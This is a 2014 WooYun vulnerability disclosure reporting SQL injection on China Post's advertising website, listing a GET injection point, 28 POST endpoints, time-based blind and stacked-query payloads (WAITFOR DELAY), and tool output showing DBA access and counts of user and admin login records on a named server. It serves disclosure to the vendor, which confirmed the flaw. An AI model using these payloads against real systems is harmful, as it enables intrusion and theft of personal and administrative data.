当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050866

漏洞标题:中国邮政广告网一处隐秘的SQL注入DBA权限(泄露管理员敏感信息,邮件信息)

相关厂商:中国邮政集团公司信息技术局

漏洞作者: HackBraid

提交时间:2014-02-13 17:16

修复时间:2014-03-30 17:16

公开时间:2014-03-30 17:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-02-13: 细节已通知厂商并且等待厂商处理中
2014-02-14: 厂商已经确认,细节仅向厂商公开
2014-02-24: 细节向核心白帽子及相关领域专家公开
2014-03-06: 细节向普通白帽子公开
2014-03-16: 细节向实习白帽子公开
2014-03-30: 细节向公众公开

简要描述:

隐秘高危SQL注入,2000多个user,某系统管理员25W+的登陆信息,10W+的邮件信息

详细说明:

站点:
http://124.207.29.201/ 中国邮政广告网
Get型注入点:
http://124.207.29.201/CheckUserName.asp?username=
Post型注入点(注意title字段):
1.http://124.207.29.201/zygg_fb/ggzx/chaxun_guandian.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
2.http://124.207.29.201/zygg_fb/zcfg/chaxun_yzxgyw.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
3.http://124.207.29.201/zygg_fb/zcfg/chaxun_xgzs.asp submit=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
4.http://124.207.29.201/zygg_fb/wzcp/wzcp_chaxun.asp submit=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
5.http://124.207.29.201/zygg_fb/zcfg/chaxun_sbf.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
6.http://124.207.29.201/zygg_fb/zcfg/chaxun_yzf.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
7.http://124.207.29.201/zygg_fb/zcfg/chaxun_fagui.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
8.http://124.207.29.201/zygg_fb/zcfg/chaxun_zzf.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
9.http://124.207.29.201/zygg_fb/zcfg/chaxun_query_res.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
10.http://124.207.29.201/zygg_fb/zcfg/chaxun_zlf.asp id=88952634&title=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD
11.http://124.207.29.201/zygg_fb/ggzx/chaxun_hangye.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
12.http://124.207.29.201/zygg_fb/ggzx/chaxun_zhishi.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
13.http://124.207.29.201/zygg_fb/ggzx/chaxun_diaoyan.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
14.http://124.207.29.201/zygg_fb/ggzx/chaxun_shiye.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
15.http://124.207.29.201/zygg_fb/ggzx/chaxun_fenxi.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
16.http://124.207.29.201/zygg_fb/ggzx/chaxun_guandian.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
17.http://124.207.29.201/zygg_fb/zcfg/chaxun_yzxgyw.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
18.http://124.207.29.201/zygg_fb/zcfg/chaxun_xgzs.asp submit=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
19.http://124.207.29.201/zygg_fb/zcfg/chaxun_zd.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
20.http://124.207.29.201/zygg_fb/zcfg/chaxun_mt.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
21.http://124.207.29.201/zygg_fb/zcfg/chaxun_yl.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
22.http://124.207.29.201/zygg_fb/zcfg/chaxun_ys.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
23.http://124.207.29.201/zygg_fb/zcfg/chaxun_qt.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
24.http://124.207.29.201/zygg_fb/zuoping/chaxun_2004y1.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
25.http://124.207.29.201/zygg_fb/zuoping/chaxun_2004j1.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
26.http://124.207.29.201/zygg_fb/zuoping/chaxun_2004t1.asp id=88952634&submit=%EF%BF%BD%EF%BF%BD%CA%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD&title=88952634
27.http://124.207.29.201/zygg_fb/huwaimeiti/search_res.asp Submit=%EF%BF%BD%EF%BF%BD%D1%AF&province=0&Type=0&Price=0&InfoTime=0&gjz=88952634
28.http://124.207.29.201/zygg_fb/zhaopin/search_res.asp submit2=%EF%BF%BD%EF%BF%BD%20%D1%AF&SType=0&select2=0&select3=0&select=0&keyword=%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD
后台地址过于简单:
http://124.207.29.201/manage/ 没验证码!

漏洞证明:

Get型注入点:
http://124.207.29.201/CheckUserName.asp?username=
DBA账户:

web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current user is DBA:    True


数据库列表:

available databases [10]:
[*] jishuqi
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pian_gx_sql
[*] pubs
[*] tempdb
[*] zygg_fb
[*] zygg_fb0402


数据库zygg_fb包含2603条账户信息:

Database: zygg_fb
+-------------+---------+
| Table       | Entries |
+-------------+---------+
| dbo.z_users | 2603    |
+-------------+---------+


数据库pian_gx_sql泄露管理员25W+的登陆信息:

Database: pian_gx_sql
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| dbo.Syslogin | 252400  |
+--------------+---------+


还有邮件mail 10W+的敏感信息:

y.jpg


Post型注入:

Place: POST
Parameter: select2
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: submit2=%EF%BF%BD%EF%BF%BD %D1%AF&SType=0&select2=0'; WAITFOR DELAY '0:0:5'--&select3=0&select=0&keyword=%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: submit2=%EF%BF%BD%EF%BF%BD %D1%AF&SType=0&select2=0' WAITFOR DELAY '0:0:5'--&select3=0&select=0&keyword=%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000


修复方案:

未做破坏,只计算了信息量。

版权声明:转载请注明来源 HackBraid@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-02-14 15:05

厂商回复:

谢谢,我们会尽快联系相关负责人处理。

最新状态:

暂无